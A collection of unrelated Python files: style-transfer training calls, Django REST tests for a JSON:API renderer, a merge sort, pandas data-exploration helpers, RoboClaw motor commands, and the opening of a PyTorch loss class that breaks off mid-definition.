# train('content2.jpg', 'style3_muse.jpg', dir_label='test1--')
# train('content2.jpg', 'style4_mosaic.jpg', dir_label='test1--')
# train('content2.jpg', 'style5_cubist.jpg', dir_label='test1--')
# train('content0.jpg', 'style1_starry.jpg', dir_label='test1--')
# train('content0.jpg', 'style2_udnie.jpg', dir_label='test1--')
# train('content0.jpg', 'style3_muse.jpg', dir_label='test1--')
# train('content0.jpg', 'style4_mosaic.jpg', dir_label='test1--')
# train('content0.jpg', 'style5_cubist.jpg', dir_label='test1--')
# set_content_tensor_list(_select=[2, 3, 4, 5, 6], _weight_list=[0.16, 0.22, 0.31, 0.22, 0.16])
# set_style_tensor_list( _select=[10, 10, 12, 14, 15], _weight_list=[0.16, 0.22, 0.31, 0.22, 0.16])
# train('content1.jpg', 'style1_starry.jpg', dir_label='test2--')
# train('content1.jpg', 'style2_udnie.jpg', dir_label='test2--')
# train('content1.jpg', 'style3_muse.jpg', dir_label='test2--')
# train('content1.jpg', 'style4_mosaic.jpg', dir_label='test2--')
# train('content1.jpg', 'style5_cubist.jpg', dir_label='test2--')
# train('content2.jpg', 'style1_starry.jpg', dir_label='test2--')
# train('content2.jpg', 'style2_udnie.jpg', dir_label='test2--')
# train('content2.jpg', 'style3_muse.jpg', dir_label='test2--')
# train('content2.jpg', 'style4_mosaic.jpg', dir_label='test2--', beta_list=[0.3601, 0.6001, 0.8801, 0.9601, 0.9961])
# train('content2.jpg', 'style5_cubist.jpg', dir_label='test2--')
# train('content0.jpg', 'style1_starry.jpg', dir_label='test2--', beta_list=[0.3601, 0.6001, 0.8801, 0.9601, 0.9961])
# train('content0.jpg', 'style2_udnie.jpg', dir_label='test2--')
# train('content0.jpg', 'style3_muse.jpg', dir_label='test2--')
# train('content0.jpg', 'style4_mosaic.jpg', dir_label='test2--')
# train('content0.jpg', 'style5_cubist.jpg', dir_label='test2--', beta_list=[0.0401, 0.1201, 0.3601, 0.6001, 0.8801, 0.9601, 0.9961])
# set_content_tensor_list(_select=[5, 8, 11, 13, 14], _weight_list=[0.16, 0.22, 0.31, 0.22, 0.16])
# set_style_tensor_list( _select=[8, 10, 12, 14, 15], _weight_list=[0.16, 0.22, 0.31, 0.22, 0.16])
# train('content1.jpg', 'style1_starry.jpg', dir_label='test3--')
# train('content1.jpg', 'style2_udnie.jpg', dir_label='test3--', beta_list=[0.1201, 0.3601, 0.6001, 0.8801, 0.9601, 0.9961])
# train('content1.jpg', 'style3_muse.jpg', dir_label='test3--', beta_list=[0.6001, 0.8801, 0.9601, 0.9961])
# train('content1.jpg', 'style4_mosaic.jpg', dir_label='test3--')
# train('content1.jpg', 'style5_cubist.jpg', dir_label='test3--')
# train('content2.jpg', 'style1_starry.jpg', dir_label='test3--')
# train('content2.jpg', 'style2_udnie.jpg', dir_label='test3--')
# train('content2.jpg', 'style3_muse.jpg', dir_label='test3--', beta_list=[0.0021, 0.0091, 0.0401, 0.1201, 0.3601, 0.6001, 0.8801, 0.9601, 0.9961])
# train('content2.jpg', 'style4_mosaic.jpg', dir_label='test3--')
# train('content2.jpg', 'style5_cubist.jpg', dir_label='test3--')
# train('content0.jpg', 'style1_starry.jpg', dir_label='test3--', beta_list=[0.6001, 0.8801, 0.9601, 0.9961])
# train('content0.jpg', 'style2_udnie.jpg', dir_label='test3--')
# train('content0.jpg', 'style3_muse.jpg', dir_label='test3--', beta_list=[0.9961])
# train('content0.jpg', 'style4_mosaic.jpg', dir_label='test3--', beta_list=[0.0401, 0.1201, 0.3601, 0.6001, 0.8801, 0.9601, 0.9961])
# train('content0.jpg', 'style5_cubist.jpg', dir_label='test3--')
set_content_tensor_list(_select=[3, 6, 8, 11, 14], _weight_list=[0.31, 0.31, 0.31, 0.31, 0.31])
set_style_tensor_list( _select=[3, 6, 8, 11, 14], _weight_list=[0.31, 0.31, 0.31, 0.31, 0.31])
# train('content1.jpg', 'style1_starry.jpg', dir_label='test4--')
# train('content1.jpg', 'style2_udnie.jpg', dir_label='test4--')
# train('content1.jpg', 'style3_muse.jpg', dir_label='test4--')
# train('content1.jpg', 'style4_mosaic.jpg', dir_label='test4--')
# train('content1.jpg', 'style5_cubist.jpg', dir_label='test4--', beta_list=[0.0401, 0.1201, 0.3601, 0.6001, 0.8801, 0.9601, 0.9961])
# train('content2.jpg', 'style1_starry.jpg', dir_label='test4--')
# train('content2.jpg', 'style2_udnie.jpg', dir_label='test4--')
train('content2.jpg', 'style3_muse.jpg', dir_label='test4--', beta_list=[0.3601, 0.6001, 0.8801, 0.9601, 0.9961])
train('content2.jpg', 'style4_mosaic.jpg', dir_label='test4--')
train('content2.jpg', 'style5_cubist.jpg', dir_label='test4--')
train('content0.jpg', 'style1_starry.jpg', dir_label='test4--')
train('content0.jpg', 'style2_udnie.jpg', dir_label='test4--')
train('content0.jpg', 'style3_muse.jpg', dir_label='test4--')
train('content0.jpg', 'style4_mosaic.jpg', dir_label='test4--')
train('content0.jpg', 'style5_cubist.jpg', dir_label='test4--')
|
# -*- coding: utf-8 -*-
"""Tests for API renderers."""
from __future__ import unicode_literals
from django.test import RequestFactory
from rest_framework.serializers import ListSerializer
from rest_framework.utils.serializer_helpers import ReturnDict, ReturnList
import mock
from .base import TestCase
from webplatformcompat.v2.renderers import JsonApiV10Renderer
from webplatformcompat.serializers import (
BrowserSerializer, FeatureSerializer, HistoricalBrowserSerializer)
class TestJsonApiV10Renderer(TestCase):
media_type = 'application/vnd.api+json'
base_url = 'http://testserver/api/v2/'
def setUp(self):
self.renderer = JsonApiV10Renderer()
def full_api_reverse(self, name, **kwargs):
return 'http://testserver' + self.api_reverse(name, **kwargs)
def make_context(
self, status_code=200, url=None, serializer=FeatureSerializer,
as_relationship=None, method='get', override_path=None):
response = mock.Mock(spec_set=['status_code'])
response.status_code = status_code
request = getattr(RequestFactory(), method)(url or '')
renderer_context = {
'response': response,
'request': request,
'fields_extra': serializer.get_fields_extra(),
'as_relationship': as_relationship,
'override_path': override_path,
}
return renderer_context
def make_list(self, data_list, serializer):
list_serializer = ListSerializer(child=serializer)
return ReturnList(data_list, serializer=list_serializer)
def test_paginated_empty(self):
data = {
'count': 0,
'next': None,
'previous': None,
'results': self.make_list([], BrowserSerializer())
}
url = self.full_api_reverse('browser-list')
context = self.make_context(url=url, serializer=BrowserSerializer)
output = self.renderer.render(data, self.media_type, context)
expected = {
'data': [],
'links': {
'self': url,
'next': None,
'prev': None,
},
'meta': {
'count': 0,
}
}
self.assertJSONEqual(output.decode('utf8'), expected)
def test_paginated_populated(self):
browser1 = {
'id': 1,
'slug': 'firefox_desktop',
'name': {'en': 'Firefox for Desktop'},
'note': None,
'versions': [100, 101],
'history_current': 200,
'history': [200]
}
browser2 = {
'id': 2,
'slug': 'edge',
'name': {'en': 'Edge'},
'note': None,
'versions': [300, 301],
'history_current': 400,
'history': [400]
}
results = self.make_list([browser1, browser2], BrowserSerializer())
data = {
'count': 2,
'next': None,
'previous': None,
'results': results
}
url = self.full_api_reverse('browser-list')
context = self.make_context(url=url, serializer=BrowserSerializer)
output = self.renderer.render(data, self.media_type, context)
expected = {
'data': [
{
'id': '1',
'type': 'browsers',
'attributes': {
'slug': 'firefox_desktop',
'name': {'en': 'Firefox for Desktop'},
'note': None,
},
'relationships': {
'versions': {
'data': [
{'type': 'versions', 'id': '100'},
{'type': 'versions', 'id': '101'},
],
},
'history_current': {
'data': {
'type': 'historical_browsers', 'id': '200'
},
},
'history': {
'data': [
{'type': 'historical_browsers', 'id': '200'},
],
},
},
'links': {'self': url + '/1'},
},
{
'id': '2',
'type': 'browsers',
'attributes': {
'slug': 'edge',
'name': {'en': 'Edge'},
'note': None,
},
'relationships': {
'versions': {
'data': [
{'type': 'versions', 'id': '300'},
{'type': 'versions', 'id': '301'},
],
},
'history_current': {
'data': {
'type': 'historical_browsers', 'id': '400'
},
},
'history': {
'data': [
{'type': 'historical_browsers', 'id': '400'},
],
},
},
'links': {'self': url + '/2'},
},
],
'links': {
'self': url,
'next': None,
'prev': None,
},
'meta': {
'count': 2,
}
}
self.assertJSONEqual(output.decode('utf8'), expected)
def test_null_link(self):
data = ReturnDict((
('id', 1),
('slug', 'web'),
('mdn_uri', None),
('name', {'en': 'Web'}),
('parent', None),
('children', [2, 3, 4, 5, 6, 7]),
), serializer=FeatureSerializer())
url = self.full_api_reverse('feature-detail', pk=1)
output = self.renderer.render(
data, self.media_type, self.make_context(url=url))
expected = {
'links': {'self': url},
'data': {
'id': '1',
'type': 'features',
'attributes': {
'slug': 'web',
'mdn_uri': None,
'name': {'en': 'Web'},
},
'relationships': {
'parent': {
'data': None,
'links': {
'self': url + '/relationships/parent',
'related': url + '/parent',
}
},
'children': {
'data': [
{'type': 'features', 'id': '2'},
{'type': 'features', 'id': '3'},
{'type': 'features', 'id': '4'},
{'type': 'features', 'id': '5'},
{'type': 'features', 'id': '6'},
{'type': 'features', 'id': '7'},
],
'links': {
'self': url + '/relationships/children',
'related': url + '/children',
}
},
},
},
}
self.assertJSONEqual(output.decode('utf8'), expected)
def test_empty_data(self):
output = self.renderer.render(
None, self.media_type, self.make_context())
self.assertEqual(output.decode('utf8'), '')
def test_null_id(self):
# Related items with empty relations, such as feature.parent
# for top-level features
data = {'id': None}
url = self.full_api_reverse('feature-parent', pk=1)
output = self.renderer.render(
data, self.media_type, self.make_context(url=url))
expected = {
'data': None,
'links': {'self': url}
}
self.assertJSONEqual(output.decode('utf8'), expected)
def test_no_relationships(self):
data = ReturnDict((
('id', 1),
('slug', 'web'),
('mdn_uri', None),
('name', {'en': 'Web'}),
), serializer=FeatureSerializer())
url = self.full_api_reverse('feature-detail', pk=1)
output = self.renderer.render(
data, self.media_type, self.make_context(url=url))
expected = {
'links': {'self': url},
'data': {
'id': '1',
'type': 'features',
'attributes': {
'slug': 'web',
'mdn_uri': None,
'name': {'en': 'Web'},
},
},
}
self.assertJSONEqual(output.decode('utf8'), expected)
def test_no_attributes(self):
data = ReturnDict((
('id', 2),
('parent', 1),
), serializer=FeatureSerializer())
url = self.full_api_reverse('feature-detail', pk=2)
output = self.renderer.render(
data, self.media_type, self.make_context(url=url))
expected = {
'links': {'self': url},
'data': {
'id': '2',
'type': 'features',
'relationships': {
'parent': {
'data': {'type': 'features', 'id': '1'},
'links': {
'self': self.full_api_reverse(
'feature-relationships-parent', pk=2),
'related': self.full_api_reverse(
'feature-parent', pk=2),
}
}
}
},
}
self.assertJSONEqual(output.decode('utf8'), expected)
def test_with_query_string(self):
"""Test that a URL with a query string is properly handled.
/links/self should have the query string
/data/relationships/<relation>/links/self should not
"""
data = ReturnDict((
('id', 2),
('parent', 1),
), serializer=FeatureSerializer())
url = self.full_api_reverse('feature-detail', pk=2) + '?foo=bar'
output = self.renderer.render(
data, self.media_type, self.make_context(url=url))
expected = {
'links': {'self': url},
'data': {
'id': '2',
'type': 'features',
'relationships': {
'parent': {
'data': {'type': 'features', 'id': '1'},
'links': {
'self': self.full_api_reverse(
'feature-relationships-parent', pk=2),
'related': self.full_api_reverse(
'feature-parent', pk=2),
}
}
}
},
}
self.assertJSONEqual(output.decode('utf8'), expected)
def test_permission_denied(self):
data = {
'detail': 'You do not have permission to perform this action.'
}
output = self.renderer.render(
data, self.media_type, self.make_context(status_code=403))
expected = {
'errors': [
{
'detail': data['detail'],
'status': '403'
}
]
}
self.assertJSONEqual(output.decode('utf8'), expected)
def test_field_validation_error(self):
data = ReturnDict((
('children', ['Set child.parent to add a child feature.']),
), serializer=FeatureSerializer())
output = self.renderer.render(
data, self.media_type, self.make_context(status_code=400))
expected = {
'errors': [
{
'detail': 'Set child.parent to add a child feature.',
'path': '/data/relationships/children',
'status': '400'
}
]
}
self.assertJSONEqual(output.decode('utf8'), expected)
def test_view_extra(self):
feature2 = {
'id': 2,
'slug': 'css',
'parent': 1
}
feature3 = {
'id': 3,
'slug': 'js',
'parent': 1
}
data = ReturnDict((
('id', 1),
('slug', 'web'),
('mdn_uri', None),
('name', {'en': 'Web'}),
('parent', None),
('children', [2, 3]),
('_view_extra', {
'features': self.make_list(
[feature2, feature3], FeatureSerializer()),
'meta': {'foo': 'bar'},
}),
), serializer=FeatureSerializer())
url = self.full_api_reverse('viewfeatures-detail', pk=1)
output = self.renderer.render(
data, self.media_type, self.make_context(url=url))
expected = {
'links': {
'self': url
},
'data': {
'id': '1',
'type': 'features',
'attributes': {
'slug': 'web',
'mdn_uri': None,
'name': {'en': 'Web'},
},
'relationships': {
'parent': {
'data': None,
'links': {
'self': url + '/relationships/parent',
'related': url + '/parent'
}
},
'children': {
'data': [
{'type': 'features', 'id': '2'},
{'type': 'features', 'id': '3'},
],
'links': {
'self': url + '/relationships/children',
'related': url + '/children'
}
},
},
},
'included': [
{
'id': '2',
'type': 'features',
'attributes': {
'slug': 'css',
},
'relationships': {
'parent': {
'data': {'type': 'features', 'id': '1'},
}
},
'links': {
'self': self.full_api_reverse('feature-detail', pk=2),
},
}, {
'id': '3',
'type': 'features',
'attributes': {
'slug': 'js',
},
'relationships': {
'parent': {
'data': {'type': 'features', 'id': '1'},
}
},
'links': {
'self': self.full_api_reverse('feature-detail', pk=3),
},
}
],
'meta': {
'foo': 'bar'
}
}
self.assertJSONEqual(output.decode('utf8'), expected)
def test_linked_error(self):
data = {
'_view_extra': {
'features': {
0: {'parent': ['Feature must be a descendant.']},
}
}
}
output = self.renderer.render(
data, self.media_type, self.make_context(status_code=400))
expected = {
'errors': [{
'status': '400',
'path': '/included.features.0.parent',
'detail': 'Feature must be a descendant.'
}]
}
self.assertJSONEqual(output.decode('utf8'), expected)
def test_subject_error(self):
data = {
'_view_extra': {
'features': {
None: {'children': ['MYSTERY ERROR.']},
}
}
}
output = self.renderer.render(
data, self.media_type, self.make_context(status_code=400))
expected = {
'errors': [{
'status': '400',
'path': '/included.features.subject.children',
'detail': 'MYSTERY ERROR.'
}]
}
self.assertJSONEqual(output.decode('utf8'), expected)
def test_options(self):
data = {
'actions': {
'PUT': {
# In full OPTIONS response, PUT has all field data
'names': {'attributues': 'values'}
},
},
'description': '',
'name': 'Browser',
'parses': [
'application/vnd.api+json',
'application/x-www-form-urlencoded',
'multipart/form-data',
],
'renders': ['application/vnd.api+json', 'text/html']
}
url = self.api_reverse('browser-detail', pk=1)
context = self.make_context(
url=url, serializer=BrowserSerializer, method='options')
output = self.renderer.render(data, self.media_type, context)
expected = {'meta': data}
self.assertJSONEqual(output.decode('utf8'), expected)
def test_as_relationship_none(self):
data = {'parent': None}
url = self.full_api_reverse('feature-relationships-parent', pk=6)
context = self.make_context(
url=url, as_relationship='parent',
override_path=self.api_reverse('feature-detail', pk=6))
output = self.renderer.render(data, self.media_type, context)
expected = {
'links': {
'self': url,
'related': self.full_api_reverse('feature-parent', pk=6),
},
'data': None
}
self.assertJSONEqual(output.decode('utf8'), expected)
def test_as_relationship_to_one(self):
data = {'parent': 1}
url = self.full_api_reverse('feature-relationships-parent', pk=6)
context = self.make_context(
url=url, as_relationship='parent',
override_path=self.api_reverse('feature-detail', pk=6))
output = self.renderer.render(data, self.media_type, context)
expected = {
'links': {
'self': url,
'related': self.full_api_reverse('feature-parent', pk=6),
},
'data': {'type': 'features', 'id': '1'}
}
self.assertJSONEqual(output.decode('utf8'), expected)
def test_as_relationship_to_many_empty(self):
data = {'children': []}
url = self.full_api_reverse('feature-relationships-children', pk=6)
context = self.make_context(
url=url, as_relationship='children',
override_path=self.api_reverse('feature-detail', pk=6))
output = self.renderer.render(data, self.media_type, context)
expected = {
'links': {
'self': url,
'related': self.full_api_reverse('feature-children', pk=6),
},
'data': []
}
self.assertJSONEqual(output.decode('utf8'), expected)
def test_as_relationship_to_many(self):
data = {'children': [7, 8, 9]}
url = self.full_api_reverse('feature-relationships-children', pk=6)
context = self.make_context(
url=url, as_relationship='children',
override_path=self.api_reverse('feature-detail', pk=6))
output = self.renderer.render(data, self.media_type, context)
expected = {
'links': {
'self': url,
'related': self.full_api_reverse('feature-children', pk=6),
},
'data': [
{'type': 'features', 'id': '7'},
{'type': 'features', 'id': '8'},
{'type': 'features', 'id': '9'},
]
}
self.assertJSONEqual(output.decode('utf8'), expected)
def test_as_relationship_from_historical_to_current(self):
"""Test viewing the current resource ID from a historical resource.
Such as:
/api/v2/historical_browsers/relationships/browser
"""
data = {'object_id': '100'}
url = self.full_api_reverse(
'historicalbrowser-relationships-browser', pk=200)
context = self.make_context(
url=url, as_relationship='browser',
serializer=HistoricalBrowserSerializer,
override_path=self.api_reverse('historicalbrowser-detail', pk=200))
output = self.renderer.render(data, self.media_type, context)
expected = {
'data': {'type': 'browsers', 'id': '100'},
'links': {
'self': url,
'related': self.full_api_reverse(
'historicalbrowser-browser', pk=200),
},
}
self.assertJSONEqual(output.decode('utf8'), expected)
def test_archived_representation(self):
data = {
'id': 1,
'changeset': 100,
'event': 'created',
'date': '2014-08-25T20:50:38.868903Z',
'object_id': 200,
'archived_representation': {
'id': '200',
'name': {'en': 'A Browser'},
'note': None,
'slug': 'browser',
'links': {
'history_current': '1',
'versions': [],
},
},
}
url = self.full_api_reverse('historicalbrowser-detail', pk=1)
browser_url = self.full_api_reverse('browser-detail', pk=200)
context = self.make_context(
url=url, serializer=HistoricalBrowserSerializer)
output = self.renderer.render(data, self.media_type, context)
expected = {
'links': {'self': url},
'data': {
'id': '1',
'type': 'historical_browsers',
'attributes': {
'date': '2014-08-25T20:50:38.868903Z',
'event': 'created',
'archive_data': {
'id': '200',
'type': 'browsers',
'attributes': {
'slug': 'browser',
'name': {'en': 'A Browser'},
'note': None,
},
'relationships': {
'history_current': {
'data': {
'type': 'historical_browsers',
'id': '1',
},
},
'versions': {'data': []},
},
'links': {'self': browser_url},
},
},
'relationships': {
'browser': {
'data': {'type': 'browsers', 'id': '200'},
'links': {
'self': url + '/relationships/browser',
'related': url + '/browser',
},
},
'changeset': {
'data': {
'type': 'changesets',
'id': '100',
},
'links': {
'self': url + '/relationships/changeset',
'related': url + '/changeset',
},
},
},
},
}
self.assertJSONEqual(output.decode('utf8'), expected)
def test_construct_resource_uri_with_underscore(self):
"""Test constructing a URI for a resource type with an underscore.
This happens when fetching the related historical items, such as:
/api/v2/browsers/6/history
"""
# The pattern for resource
related_history = self.api_reverse('browser-history', pk='6')
request = RequestFactory().get(related_history)
self.renderer.request = request
uri = self.renderer.construct_resource_uri(
'historical_browsers', '100', {})
expected = 'http://testserver/api/v2/historical_browsers/100'
self.assertEqual(expected, uri)
|
class Merge_sort:
'''
归并排序
'''
def sort(self, nums):
'''
: type nums: List[int] 要排序的数组
'''
self.merge_sort(nums, 0, len(nums)-1)
def merge_sort(self, nums, left, right):
if left < right:
mid = (left + right)//2
self.merge_sort(nums, left, mid)
self.merge_sort(nums, mid+1, right)
self.merge_arr(nums, left, mid, right)
def merge_arr(self, nums, left, mid, right):
m = right - left + 1
helper_arr = [0]*m
i, j = left, mid+1
for k in range(m):
if self.less(nums, i, j, mid, right):
helper_arr[k] = nums[i]
i += 1
else:
helper_arr[k] = nums[j]
j += 1
for i in range(left, right+1):
nums[i] = helper_arr[i - left]
def less(self, nums, i, j, mid, right):
if j > right or (i <= mid and nums[i] <= nums[j]):
return True
return False
if __name__ == '__main__':
print("start")
a = [1, 7, 3, 5, 4, 0, 20, 5]
s = Merge_sort()
s.sort(a)
print(a)
print("end")
|
import time
import sys
import dask.dataframe as dd
import pandas as pd
#from memory_profiler import profile
def timefunc(f):
def f_timer(*args, **kwargs):
start = time.time()
result = f(*args, **kwargs)
end = time.time()
print ('... Time run ==>' ,f.__name__, 'took', round(end - start,4), 'seconds' )
return result
return f_timer
def reduce_data_memory(data):
for f in ['int','float','object']:
if f=='object':
data_object = data.select_dtypes(include=[f])
for c in data_object.columns:
if data_object[c].nunique()==1:
print('!!!object column '+c+' has only 1 value')
else:
data[data.select_dtypes(include=[f]).columns] = data.select_dtypes(include=[f]).apply(pd.to_numeric,downcast='unsigned')
return data
@timefunc
def read_data_with_cond(data_file_str,reduce_memory=False,cond_and_str=None,output_path_pre=None,sep='\t'):
import re
print('----------------begin------------------')
try:
if sep=='\t':
data = dd.read_table(data_file_str,low_memory=False,dtype={'uid': 'object'}).compute()
if sep==',':
data = dd.read_csv(data_file_str,low_memory=False,dtype={'uid': 'object'}).compute()
except:
if sep=='\t':
data = pd.read_table(data_file_str,low_memory=False,dtype={'uid': 'object'})
if sep==',':
data = pd.read_csv(data_file_str,low_memory=False,dtype={'uid': 'object'})
print('--initial')
print(data.info())
if reduce_memory:
print('--reduce_memory')
data = reduce_data_memory(data)
print(data.info())
if cond_and_str:
print('--cond')
cnt=1
for cond in cond_and_str.split(','):
pattern = re.compile(r'^.*>=.*$')
if pattern.match(cond):
f,n = cond.split('>=')[0],int(cond.split('>=')[1])
data = data[data[f]>=n]
print('shape of data after cond',cnt,':',data.shape)
pattern = re.compile(r'^.*==.*$')
if pattern.match(cond):
f,n = cond.split('==')[0],int(cond.split('==')[1])
data = data[data[f]==n]
print('shape of data after cond',cnt,':',data.shape)
pattern = re.compile(r'^.*isnull.*$')
if pattern.match(cond):
f = cond.split('.')[0]
data = data[data[f].isnull()]
print('shape of data after cond',cnt,':',data.shape)
cnt+=1
print(data.info())
print('------------conclusion---------------')
print('shape of dataset:',data.shape)
print('-------------outputs------------------')
if output_path_pre:
columns = pd.DataFrame(data.dtypes)
columns = columns.reset_index()
columns.columns = ['feature_name','dtypes']
columns.to_csv(output_path_pre+'columns.csv',index=False,header=True)
print('column names and dtypes have been downloaded to ',output_path_pre+'columns.csv')
return data
@timefunc
def remove_high_relevance(train,featuresList,method='pearson',threshold=0.9):
from tqdm import tqdm
numeric_features = [c for c in featuresList if ('int' in str(train[c].dtypes) or 'float' in str(train[c].dtypes))]
print('the length of numeric features is:',len(numeric_features))
removeSet=set()
iSet = set()
for i in tqdm(numeric_features):
if i not in removeSet:
iSet.add(i)
for j in numeric_features:
if j not in removeSet and i not in removeSet and j not in iSet:
pearsonr = (train[[i,j]].corr(method=method).loc[i,j])
if abs(pearsonr)>threshold:
print('pearsonr of',i,'and',j,'is',pearsonr,end='! ')
if train[i].count()>=train[j].count():
removeSet.add(j)
print('remove',j)
else:
removeSet.add(i)
print('remove',i)
return list(removeSet)
@timefunc
def get_features_attr(data,idList_str=None,targetList_str=None,featuresList=None,missing_warn=0.99,remove={'list':None,'missing':False,'single':False},output_path_pre=None):
import pickle
import openpyxl
removeSet = set()
if featuresList is None:
idList = idList_str.split(',')
targetList = targetList_str.split(',')
featuresList = [c for c in data.columns if c not in idList and c not in targetList]
if remove['list']:
removeList = remove['list'].split(',')
featuresList = [c for c in featuresList if c not in removeList]
print('---------------------removelist-----------------')
print('remove',len(removeList),'features')
print('----------------missing-------------------')
feature_missing = []
remove_missing = []
for i in featuresList:
if data[i].count()/data.shape[0]<1:
feature_missing.append([i,round(1-data[i].count()/data.shape[0],4),str(data[i].dtypes)])
if 1-data[i].count()/data.shape[0]>missing_warn:
print('!!!WARN missing_rate of',i,'is',round(1-data[i].count()/data.shape[0],4))
if remove['missing']:
remove_missing.append(i)
del feature_missing[-1]
if len(feature_missing)>0:
feature_missing = pd.DataFrame(feature_missing)
feature_missing.columns = ['feature_name','missing_rate','dtype']
feature_missing.sort_values(by=['missing_rate'],ascending=False)
if len(remove_missing)>0:
print('remove',len(remove_missing),'missing features,','remaining',feature_missing.shape[0],'missing features')
else:
print('there are',feature_missing.shape[0],'missing features')
else:
print('remove',len(remove_missing),'missing features,','remaining',0,'missing features')
print('------------------single---------------------')
remove_single=[]
for i in featuresList:
if data[i].nunique()<=1:
print('!!!WARN nunique of',i,'is only',data[i].nunique())
if remove['single']:
remove_single.append(i)
if len(remove_single)>0:
print('remove',len(remove_single),'features with single value')
print('--------------------totally---------------------')
featuresList = [c for c in featuresList if c not in remove_missing and c not in remove_single]
print('numbers of features:',len(featuresList))
dtypes_df = pd.DataFrame(data[featuresList].dtypes).reset_index().groupby([0]).count().reset_index()
for i in dtypes_df[0]:
print('--numbers of',i,'features are:',dtypes_df[dtypes_df[0]==i]['index'].values[0])
print('-------------outputs------------------')
if output_path_pre:
with open(output_path_pre+'features.pkl','wb') as f:
pickle.dump(featuresList,f)
print('feature list has been downloaded to ',output_path_pre+'features.pkl')
if output_path_pre and len(feature_missing)>0:
feature_missing.to_csv(output_path_pre+'feature_missing.csv',index=False,header=True,float_format='%0.2f')
print('missing features has been downloaded to ',output_path_pre+'feature_missing.csv')
if output_path_pre:
writer = pd.ExcelWriter(output_path_pre+'feature_describe.xlsx')
for d in data[featuresList].dtypes.unique():
data[featuresList].select_dtypes(include=[d]).describe().T.to_excel(writer,str(d))
writer.save()
print('features describe has been downloaded to ',output_path_pre+'feature_describe.xlsx')
return featuresList,feature_missing
@timefunc
def display_x_y(data,features_list,target_str,output_path_pre,target_type='category'):
import seaborn as sns
import matplotlib.pyplot as plt
import pickle
import re
from matplotlib.backends.backend_pdf import PdfPages
from tqdm import tqdm
import numpy as np
if isinstance(features_list,str):
with open(features_list, 'rb') as f:
featuresList = pickle.load(f)
else:
featuresList = features_list
target = target_str
if target_type=='category':
# float
pattern = re.compile(r'^.*float.*$')
float_features = [c for c in featuresList if pattern.match(str(data[c].dtypes)) and data[c].nunique()>2]
object_features = [c for c in featuresList if pattern.match(str(data[c].dtypes)) and data[c].nunique()<=2]
if len(float_features)>0:
print('--------exploring float features--------')
with PdfPages(output_path_pre+'float_plot.pdf') as pdf:
for i in tqdm(float_features):
fig = plt.figure(figsize=(8, 6))
sns.boxplot(x=target, y=i, data=pd.concat([data[target], data[i]], axis=1),showfliers=False)
pdf.savefig(fig)
print('plots have been saved at',output_path_pre+'float_plot.pdf')
#int
pattern = re.compile(r'^.*int.*$')
int_features = [c for c in featuresList if pattern.match(str(data[c].dtypes))]
if len(int_features)>0:
print('-------------exploring int features----------')
int_tab_features = [c for c in int_features if data[c].nunique()<=3]
if len(int_tab_features)>0:
with pd.ExcelWriter(output_path_pre+'int_tab.xlsx') as writer:
for i in tqdm(int_tab_features):
crosstab_num = data[[target,i]].pivot_table(index=[target],columns=i,aggfunc=len,margins=True)
crosstab_freq = pd.DataFrame(np.array(crosstab_num)/np.array(crosstab_num.loc['All',:]).reshape((1,-1)))
crosstab_freq.columns,crosstab_freq.index = crosstab_num.columns,crosstab_num.index
crosstab_freq.to_excel(writer,i)
print('tables have been saved at',output_path_pre+'int_tab.xlsx')
int_plot_features = [c for c in int_features if data[c].nunique()>3]
if len(int_plot_features)>0:
with PdfPages(output_path_pre+'int_plot.pdf') as pdf:
for i in tqdm(int_plot_features):
fig = plt.figure(figsize=(8, 6))
sns.boxplot(x=target, y=i, data=pd.concat([data[target], data[i]], axis=1),showfliers=False)
pdf.savefig(fig)
print('plots have been saved at',output_path_pre+'int_plot.pdf')
#object
object_features += [c for c in featuresList if data[c].dtypes=='object']
if len(object_features)>0:
print('-------------exploring object features----------')
with pd.ExcelWriter(output_path_pre+'object_tab.xlsx') as writer:
for i in tqdm(object_features):
object_values = list(data.groupby(i).size().sort_values(ascending=False).index[:10])
corsstab_data = data[data[i].isin(object_values)].fillna(-999)
crosstab_num = corsstab_data[[target,i]].pivot_table(index=[target],columns=i,aggfunc=len,margins=True)
crosstab_freq = pd.DataFrame(np.array(crosstab_num)/np.array(crosstab_num.loc['All',:]).reshape((1,-1)))
crosstab_freq.columns,crosstab_freq.index = crosstab_num.columns,crosstab_num.index
crosstab_freq.to_excel(writer,i)
print('tables have been saved at',output_path_pre+'object_tab.xlsx')
else:
# float
pattern = re.compile(r'^.*float.*$')
float_features = [c for c in featuresList if pattern.match(str(data[c].dtypes)) and data[c].nunique()>2]
object_features = [c for c in featuresList if pattern.match(str(data[c].dtypes)) and data[c].nunique()<=2]
if len(float_features)>0:
print('--------exploring float features--------')
with PdfPages(output_path_pre+'float_plot.pdf') as pdf:
for i in tqdm(float_features):
fig = plt.figure(figsize=(8, 6))
plt.scatter(x=i, y=target, data=pd.concat([data[target], data[i]], axis=1))
plt.xlabel(i)
plt.ylabel(target)
pdf.savefig(fig)
print('plots have been saved at',output_path_pre+'float_plot.pdf')
#int
pattern = re.compile(r'^.*int.*$')
int_features = [c for c in featuresList if pattern.match(str(data[c].dtypes))]
print('-------------exploring int features----------')
if len(int_features)>0:
with PdfPages(output_path_pre+'int_plot.pdf') as pdf:
for i in tqdm(int_features):
if data[i].nunique()>3:
fig = plt.figure(figsize=(8, 6))
plt.scatter(x=i, y=target, data=pd.concat([data[target], data[i]], axis=1))
plt.xlabel(i)
plt.ylabel(target)
pdf.savefig(fig)
else:
fig = plt.figure(figsize=(8, 6))
sns.boxplot(x=i, y=target, data=pd.concat([data[target], data[i]], axis=1),showfliers=False)
pdf.savefig(fig)
print('plots have been saved at',output_path_pre+'int_plot.pdf')
#object
object_features += [c for c in featuresList if data[c].dtypes=='object']
if len(object_features)>0:
print('-------------exploring object features----------')
with PdfPages(output_path_pre+'int_plot.pdf') as pdf:
for i in tqdm(object_features):
fig = plt.figure(figsize=(8, 6))
sns.boxplot(x=i, y=target, data=pd.concat([data[target], data[i]], axis=1),showfliers=False)
pdf.savefig(fig)
print('tables have been saved at',output_path_pre+'object_plot.pdf')
|
from roboclaw import *
M1Forward(128,16)
M2Forward(128,16)
M2Forward(129,16)
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.init as init
import torch.nn.functional as F
from torch.autograd import Variable
def l2norm2d(inputs, k):
# k dimension to normalize
norm = torch.sqrt(torch.sum(inputs * inputs, k)) + 1e-12
return inputs / norm.expand_as(inputs)
class ClassifyLoss(nn.Module):
# max pooling over nodes in one statement.
def __init__(self, nFeats_in=None, nFeats_out=None, layer_list=None,
dropout=0, bias=False):
super(ClassifyLoss, self).__init__()
self.dropout = dropout
if layer_list is None:
self.list = False
